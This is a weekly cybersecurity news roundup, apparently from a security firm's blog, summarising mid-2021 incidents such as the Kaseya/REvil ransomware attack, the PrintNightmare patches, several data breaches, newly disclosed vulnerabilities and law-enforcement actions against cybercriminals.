    Navigating the PrintNightmare vulnerabilities this week has been a challenge. An out-of-band patch released earlier this week was found to be incomplete, with various security experts sharing details of how to bypass the patch. “Microsoft says the emergency security updates released at the start of the week correctly patch the PrintNightmare Print Spooler vulnerability for all supported Windows versions and urges users to start applying the updates as soon as possible. Our investigation has shown that the OOB security update is working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare," the Microsoft Security Response Center explains. "All reports we have investigated have relied on the changing of default registry setting related to Point and Print to an insecure configuration.”

    Kaseya Warns of Phishing Campaign Pushing Fake Security Updates

    We reported earlier this week that threat actors were using fake Kaseya update emails as a lure to trap victims. Kaseya today confirmed our reports and warned of an additional phishing campaign that attempts to breach networks by spamming malicious attachments and embedded links. The emails pretend to be legitimate security updates for Kaseya VSA.

    Insurance Giant CNA Reports Data Breach after Ransomware Attack

    The US-based insurance company CNA Financial Corporation began notifying customers of a data breach following attacks by Phoenix CryptoLocker ransomware that occurred back in March of this year. CNA is one of the largest commercial insurance firms in the US, assisting businesses in the US, Canada, Europe, and Asia. The company said a limited amount of data was copied before the threat actors deployed their ransomware

    Critical Sage X3 RCE Bug Allows Full System Takeovers

    “Four vulnerabilities afflict the popular Sage X3 enterprise resource planning (ERP) platform, researchers found – including one critical bug that rates 10 out of 10 on the CVSS vulnerability-severity scale. Two of the bugs could be chained together to allow complete system takeovers, with potential supply-chain ramifications”

    US: We May Take Unilateral Action Against Russian Cyber-Criminals

    The White House has issued another warning to Russia after cybercriminals continue to attack American organizations and critical infrastructure. REvil ransomware operators as well as other cybercriminals are reportedly residing in Russia, where the Putin administration has historically done nothing to curb cyber attacks coming from Russian soil.

    SonicWall Addresses Critical CVE-2021-20026 Flaw in NSM Devices

    Last May, SonicWall asked customers to immediately patch CVE-2021-20026, a post-authentication vulnerability in the vendor's Network Security Manager (NSM) product. The company released further details this week, highlighting a command injection vulnerability. The vulnerability received a CVSS score of 8.8 and could be exploited without any user interaction. An authenticated attacker could perform command injection by using specially crafted HTTP requests.

    Fake Kaseya VSA Security Update Backdoors Networks with Cobalt Strike

    Threat actors are pushing a fake Kaseya VSA security update in an attempt to capitalize on the current ransomware situation impacting the vendor. Cobalt Strike is the payload delivered in this active spam campaign. “Cobalt Strike is a legitimate penetration testing tool and threat emulation software that's also used by attackers for post-exploitation tasks and to deploy so-called beacons that allow them to gain remote access to compromised systems”

    Microsoft Releases Out-of-Band Security Updates for PrintNightmare

    Microsoft has released out-of-band security updates to address a remote code execution (RCE) vulnerability—known as PrintNightmare (CVE-2021-34527)—in the Windows Print spooler service. According to the CERT Coordination Center (CERT/CC), “The Microsoft Windows Print Spooler service fails to restrict access to functionality that allows users to add printers and related drivers, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system.”

    Operation Lyrebird: Group-IB Assists INTERPOL in Identifying Suspect Behind Numerous Cybercrimes

    Group-IB created Operation Lyrebird which helps in the identification and apprehension of high profile threat actors. This week Group-IB assisted INTERPOL in the arrest of Dr. HeX, a cybercriminal responsible for multiple attacks against French telecommunications companies, major banks and multinational corporations. Following a two-year investigation, Morroccan police arrested the alleged criminal through data on his cybercrimes provided by Group-IB.

    Revil Ransomware Gang Hit Spanish Telecom Giant MasMovil

    REvil ransomware operators attacked MasMovil, one of the largest Spanish telecommunication providers last week. In addition to encrypting their networks, the group claims to have also stolen sensitive data from the company. The group has shared screenshots of the allegedly stolen documents to it’s leak site and includes a list of folders.

    1,500 businesses Hit by REvil Ransomware in Kaseya Attack

    In a statement released by Kaseya yesterday, the vendor shared further details of the recent cyberattacks against customers using Kaseya VSA on-premise products. According to Kaseya, the ransomware was able to breach the systems of roughly 60 of it’s direct customers, and at least 1,500 downstream victims were impacted through Kaseya remote management tools.

    Kaseya says the attack has a “limited impact” with only 50 of their more than 35,000 customers being breached, and of their small business customers 800-1,500 of their approximately 800,000-1,000,000 have been compromised.

    Chronicles of the Babuk Malware

    In contrast with previously observed ransomware threat actors, Babuk’ operators advertise in English on more visible hacking forums. This new ransomware also lacks « kill-switches » that is a common feature usually tailored by the top-tier ransomware ecosystem when detecting languages of the Commonwealth of Independent States (CIS) set as default.

    Microsoft Warns of Critical PowerShell 7 Code Execution Vulnerability

    "Microsoft warns of a critical .NET Core remote code execution vulnerability in PowerShell 7 caused by how text encoding is performed in .NET 5 and .NET Core. PowerShell provides a command-line shell, a framework, and a scripting language focused on automation for processing PowerShell cmdlets. It runs on all major platforms, including Windows, Linux, and macOS, and it allows working with structured data such as JSON, CSV, and XML, as well as REST APIs and object models".

    Spanish Telecom Giant Masmovil Hit by Revil Ransomware Gang

    Spain's 4th largest telecom operator MasMovil Ibercom or MasMovil is the latest victim of the infamous Revil ransomware gang (aka Sodinokibi), "The telecom operator is big in Spain. The Group's fixed network reaches 18 million households with ADSL and closes to 26 million with optical fiber. Its 4G mobile network covers 98,5% of the Spanish population."

    U.S. Insurance Giant AJG Reports Data Breach After Ransomware Attack

    The company experienced a ransomware attack on or around September 26, 2020, impacting its business operations. The company reported that they immediately took their systems offline to prevent further intrusion and initiated response protocols, notified law enforcement, launched an investigation with the assistance of third-party cybersecurity and forensic specialists, and implemented its business continuity plans to minimize disruption to its customers.

    Google Chrome Will Get an Https-Only Mode for Secure Browsing

    Google is working on adding an HTTPS-Only Mode to the Chrome web browser to protect users' web traffic from eavesdropping by upgrading all connections to HTTPS. This new feature is now being tested in the Chrome 93 Canary preview releases for Mac, Windows, Linux, Chrome OS, and Android. While no official announcement has been made yet, HTTPS-Only Mode [1, 2] will likely start rolling out on August 31, when Chrome 93 is expected to reach stable status. Google has previously updated Chrome to default to HTTPS for all URLs typed in the address bar if the user specifies no protocol.

    DoubleVPN Servers, Logs, and Account Info Seized by Law Enforcement

    An international law enforcement operation has seized the servers, data, and customer logs for DoubleVPN, a double-encryption service commonly used by threat actors to evade detection while performing malicious activities, "DoubleVPN was heavily advertised on both Russian and English-speaking underground cybercrime forums as a means to mask the location and identities of ransomware operators and phishing fraudsters (EuroPol, 2021)."

    Hades Ransomware Gang Claims More Victims

    According to a report released by Accenture Security on Tuesday, it appears that Hades Ransomware group has taken further steps in an apparent bid to confuse investigators who have tried to work out who exactly the operators are.

    Linux Version of REvil Ransomware Targets ESXi VM

    We reported a few weeks ago that a new strain of the REvil ransomware was modified to infect not only Windows-based systems but also Linux. VMWare's ESXi hosts have actively been targeted attacks, "The REvil ransomware operators are now using a Linux encryptor to encrypt VMWare ESXi virtual machines which enterprises widely adopt,

    Details of over 200,000 students leaked in cyberattack

    Attacks against educational sectors and students are steadily increasing. A few weeks ago we reported that the University of Iowa was hit with ransomware, and as a result students were unable to complete their assignments. This week a pro-Palestinian Malaysian hacker group known as "DragonForce" claimed that it hacked into AcadeME last week resulting in a substantial data leak. The details of approximately 280,00 students were compromised including, emails, passwords, first/last names, addresses, phone numbers of students who were registered on AcadeME.

    A Cisco ASA Vulnerability Is Actively Exploited

    The Cisco ASA vulnerability that we reported on last week is being targeted and successfully leveraged by hackers in attacks. The vulnerability is tracked as CVE-2020-3580 and was patched and disclosed by Cisco. However it seems that the initial patch was incomplete, with a further fix being released in April 2021.

    Spear Phishing Campaign with New Techniques Aimed at Aviation Companies

    Fortinet Labs reports that there are phishing emails targeting the aviation industry specifically, delivering a remote access trojan, “The infection cycle begins with phishing emails sent to aviation companies that contain malicious links disguised as pdf attachments. The link in the email directs the user to VB Script hosting sites, from which the initial payload (.vbs) is delivered. The .vbs script then drops the second stage payload, an xml file containing inline C# .NET assembly code that acts as a RAT loader. The loader hollows and injects the final payload, AsyncRAT, into the victim process (RegSvcs.exe). AsyncRAT, also known as RevengeRAT, connects to its C2 server, takes control of the compromised machine, and introduces additional payloads.

    Microsoft signed a malicious Netfilter rootkit

    According to experts attackers used a malicious driver that was certified by Microsoft to deliver the Netfilter rootkit malware. Rootkits are particularly dangerous pieces of malware because they are able to remain hidden in infected machines, they typically contain various tools capable of stealing passwords, banking information, disabling security controls, and keylogging features.